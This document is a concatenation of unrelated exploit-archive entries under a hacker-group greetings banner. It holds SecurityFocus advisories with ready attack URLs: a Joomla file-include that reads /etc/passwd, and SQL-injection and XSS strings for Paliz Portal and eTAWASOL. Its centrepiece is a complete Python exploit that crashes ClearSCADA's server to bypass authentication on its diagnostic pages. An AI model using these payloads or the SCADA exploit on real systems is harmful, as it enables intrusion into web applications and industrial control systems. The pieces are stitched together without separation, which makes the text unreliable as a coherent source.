# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * ZoRLu
# gunslinger_ * Sn!pEr.S!Te * anT!-Tr0J4n * ^Xecuti0N3r 'www.1337day.com/team' ++ .... * Str0ke
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * TreX (hotturks.org)
# Jago-Dz (sec4ever.com) * Kalashinkov3 * PaCketStorm Team (www.packetstormsecurity.org)
# www.metasploit.com * Underground Exploitation (www.dis9.com) * All Security and Exploits Webs ...
# -+-+-+-+-+-+-+-+-+-+-+-+={ Greetings to Friendly Teams : }=+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
# (D) HaCkerS-StreeT-Team (Z) | Inj3ct0r | Exploit-ID | UE-Team | PaCket.Storm.Sec TM | Sec4Ever
# h4x0re-Sec | Dz-Ghost | INDONESIAN CODER | HotTurks | IndiShell | D.N.A | DZ Team | Milw0rm
# Indian Cyber Army | MetaSploit | BaCk-TraCk | AutoSec.Tools | HighTech.Bridge SA | Team DoS-Dz
#================================================================================================
-->
source: https://www.securityfocus.com/bid/48558/info
The 'com_jr_tfb' component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
http://www.example.com/index.php?option=com_jr_tfb&controller=../../../../../../../../etc/passwd%00
source: https://www.securityfocus.com/bid/48559/info
Paliz Portal is prone to multiple SQL-injection vulnerabilities and a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/Page.aspx?search=1[XSSCode]&mID=1641&Page=search/advancedsearch
http://www.example.com/News/shownews/[page].aspx?NewsId=[Sqli]
http://www.example.com/[Path]/Default.aspx?tabid=[Sqli]
#!/usr/bin/python
# cs-auby.py
# ClearSCADA Remote Authentication Bypass Exploit
#
# Jeremy Brown
# [jbrown3264/gmail]
#
# Oct 2010 (released Jan 2015)
#
# There is an authentication bypass vulnerability in ClearSCADA that can be
# exploited by triggering an exception in dbserver.exe and taking advantage
# of the way the program handles it.
#
# When an exception occurs, ClearSCADA enters "Safe Mode". This exposes
# its diagnostic functions to remote users without requiring a valid login
# as it would normally. A remote attacker could view sensitive information
# and possibly modify functions of the server running on the affected host.
#
# This code triggers an exception in dbserver.exe and checks to see if you
# can then access the diagnostic page without authentication.
#
# Tested on ClearSCADA 2010R1 running on Windows
#
# Fix information: http://ics-cert.us-cert.gov/advisories/ICSA-11-173-01
#
import sys
import socket
import httplib
import urllib
from time import sleep
pkt_1=(
"\xfb\x0e\x45\x06\x0e\x00\x00\x00\x18\x00\x00\x00"
"\x49\x00\x50\x00\x20\x00\x31\x00\x32\x00\x37\x00\x2e\x00\x30\x00"
"\x2e\x00\x30\x00\x2e\x00\x31\x00\x2c\x00\x20\x00\x53\x00\x65\x00"
"\x73\x00\x73\x00\x69\x00\x6f\x00\x6e\x00\x20\x00\x30\x00\x00\x00"
"\x08\x00\x00\x00"
)
pkt_2=(
"\x00\x00\x00\x00"
"\x26\x00\x00\x00"
"\x08\x00\x00\x00\x0f\x00\x00\x00\x43\x00\x72\x00\x79\x00\x73\x00"
"\x74\x00\x61\x00\x6c\x00\x52\x00\x65\x00\x70\x00\x6f\x00\x72\x00"
"\x74\x00\x73\x00\x00\x00"
)
pkt_3=( # "Exception Occured"
"\x00\x00\x00\x00\xd7\x01\x00\x00\x34\x00\x00\x00\x0d\x00\x00\x00"
"\x09\x00\x00\x00\x43\x00\x50\x00\x72\x00\x6f\x00\x66\x00\x69\x00"
"\x6c\x00\x65\x00\x00\x00\x0e\x00\x00\x00\x43\x00\x50\x00\x72\x00"
"\x6f\x00\x66\x00\x69\x00\x6c\x00\x65\x00\x46\x00\x6c\x00\x6f\x00"
"\x61\x00\x74\x00\x00\x00\x0e\x00\x00\x00\x43\x00\x50\x00\x72\x00"
"\x6f\x00\x66\x00\x69\x00\x6c\x00\x65\x00\x55\x00\x4c\x00\x6f\x00"
"\x6e\x00\x67\x00\x00\x00\x0d\x00\x00\x00\x43\x00\x50\x00\x72\x00"
"\x6f\x00\x66\x00\x69\x00\x6c\x00\x65\x00\x4c\x00\x6f\x00\x6e\x00"
"\x67\x00\x00\x00\x10\x00\x00\x00\x43\x00\x41\x00\x64\x00\xBB\x00" # last w0rd
"\x00\x42\x00\x49\x00\x54\x00\x56\x00\x61\x00\x6c\x00\x75\x00\x65"
"\x00\x4d\x00\x61\x00\x70\x00\x00\x00\x11\x00\x00\x00\x43\x00\x41"
"\x00\x64\x00\x76\x00\x42\x00\x59\x00\x54\x00\x45\x00\x56\x00\x61"
"\x00\x6c\x00\x75\x00\x65\x00\x4d\x00\x61\x00\x70\x00\x00\x00\x11"
"\x00\x00\x00\x43\x00\x41\x00\x64\x00\x76\x00\x57\x00\x4f\x00\x52"
"\x00\x44\x00\x56\x00\x61\x00\x6c\x00\x75\x00\x65\x00\x4d\x00\x61"
"\x00\x70\x00\x00\x00\x11\x00\x00\x00\x43\x00\x41\x00\x64\x00\x76"
"\x00\x44\x00\x49\x00\x4e\x00\x54\x00\x56\x00\x61\x00\x6c\x00\x75"
"\x00\x65\x00\x4d\x00\x61\x00\x70\x00\x00\x00\x12\x00\x00\x00\x43"
"\x00\x41\x00\x64\x00\x76\x00\x55\x00\x44\x00\x49\x00\x4e\x00\x54"
"\x00\x56\x00\x61\x00\x6c\x00\x75\x00\x65\x00\x4d\x00\x61\x00\x70"
"\x00\x00\x00\x11\x00\x00\x00\x43\x00\x41\x00\x64\x00\x76\x00\x52"
"\x00\x45\x00\x41\x00\x4c\x00\x56\x00\x61\x00\x6c\x00\x75\x00\x65"
"\x00\x4d\x00\x61\x00\x70\x00\x00\x00\x13\x00\x00\x00\x43\x00\x41"
"\x00\x64\x00\x76\x00\x44\x00\x4f\x00\x55\x00\x42\x00\x4c\x00\x45"
"\x00\x56\x00\x61\x00\x6c\x00\x75\x00\x65\x00\x4d\x00\x61\x00\x70"
"\x00\x00\x00\x13\x00\x00\x00\x43\x00\x41\x00\x64\x00\x76\x00\x53"
"\x00\x74\x00\x72\x00\x69\x00\x6e\x00\x67\x00\x56\x00\x61\x00\x6c"
"\x00\x75\x00\x65\x00\x4d\x00\x61\x00\x70\x00\x00\x00\x0f\x00\x00"
"\x00\x43\x00\x43\x00\x72\x00\x79\x00\x73\x00\x74\x00\x61\x00\x6c"
"\x00\x52\x00\x65\x00\x70\x00\x6f\x00\x72\x00\x74\x00\x00\x00\x00"
)
port=5481
s_port=443

def do_ssl(target,port):
    try:
        conn = httplib.HTTPSConnection(target,port)
        conn._http_vsn = 10
        conn._http_vsn_str = "HTTP/1.0"
        conn.request("GET","/diag/Info")
        resp = conn.getresponse()
        conn.close()
    except Exception, error:
        print("Error: %s" % error)
        return None
    return resp

def main():
    if len(sys.argv)!=2:
        print("Usage: %s <target>" % sys.argv[0])
        sys.exit(0)
    target=sys.argv[1]
    cs=target,port
    print "Checking server status..."
    resp = do_ssl(target,s_port)
    if(resp == None):
        return
    if(resp.status==301):
        print "Server status is normal.\n"
    elif(resp.status==200):
        print "Server is already in safe mode."
        sys.exit(1)
    else:
        print("Server returned %d %s, server state unknown.\nContinuing anyways..\n" % (resp.status,resp.reason))
    print("Sending packets to trigger exception...\n")
    try:
        sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        sock.connect(cs)
        sock.send(pkt_1)
        resp_1 = sock.recv(32)
        sock.send(pkt_2)
        resp_2 = sock.recv(32)
        sock.send(pkt_3)
        resp_3 = sock.recv(32)
        sock.close()
    except Exception, error:
        print("Error: %s" % error)
        return None
    print("Finished, checking server status again...")
    sleep(1)
    resp = do_ssl(target,s_port)
    if(resp == None):
        return
    if(resp.status==301):
        print("Server status is still normal, maybe it's patched..\n")
    elif(resp.status==200):
        print("Server entered \"safe\" mode :)\n")
        print("Surf on over to https://%s:443/diag/Info to explore" % target)
    else:
        print("Server returned %d %s, server state unknown." % (resp.status,resp.reason))

if __name__ == "__main__":
    main()
source: https://www.securityfocus.com/bid/48561/info
eTAWASOL is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/npages/back.asp?id=[SQL]